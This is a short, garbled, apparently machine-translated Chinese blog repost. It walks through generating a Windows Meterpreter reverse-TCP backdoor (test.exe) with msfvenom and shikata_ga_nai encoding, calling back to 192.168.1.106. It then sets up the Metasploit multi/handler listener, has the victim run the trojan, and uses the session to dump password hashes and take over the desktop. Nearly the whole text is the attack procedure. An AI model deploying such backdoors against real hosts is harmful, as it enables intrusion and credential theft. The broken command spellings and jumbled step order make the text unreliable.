启动MSF控制台命令模式
2.MSF venom-p windows/meter preter/reverse _ TCP-ex86/Shi kata _ ga _ nai-i5 lhost=192.168.1.106 lport=1226
msfconsole命令模式启动use exploit/multi/handler以使用名为handler的模块,然后单击setpayloadwindows/meter preter/reverse _ tcpshow optitiows
然后呢
使用此shellcode,show options看到一条消息,提示LHOST LPORT生成木马的自己的ip和端口set LHOST自己的ip返回并输入set LPORT端口
4 .在4.exploit返回后,等待目标单击test.ext文件使其联机
1 .执行以下命令:
MSF venom-p windows/meter preter/reverse _ TCP-ex86/Shi kata _ ga _ nai-i5 lhost=192.168.1.106 lport=1234 -。
将test.exe复制到受害者主机
在Kali中键入MSF控制台,如下图所示进行配置。
运行exploit,在受害主机上运行test.exe后门木马,Metasploit获得反馈
会话
meterpreter允许您执行getuid、hashdump和授权操作,并通过getgui命令获取受害主机的图形界面。
转载于:https://www.cn blogs.com/sugar XT/p/10557658.html